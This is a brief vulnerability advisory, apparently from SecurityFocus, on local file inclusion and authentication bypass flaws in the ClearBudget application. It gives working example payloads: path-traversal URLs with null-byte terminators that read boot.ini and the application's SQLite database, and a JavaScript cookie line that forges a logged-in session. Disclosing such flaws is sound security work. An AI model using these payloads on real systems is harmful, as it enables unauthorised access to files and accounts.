ClearBudget Local File Include and Authentication Bypass Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs and sample cookie data are available:

http://www.example.com/path/index.php?action=../../../../boot.ini%00
http://www.example.com/path/index.php?action=../db/budget.sqlite%00

javascript:document.cookie = "user=true; path=/";


 

Privacy Statement
Copyright 2010, SecurityFocus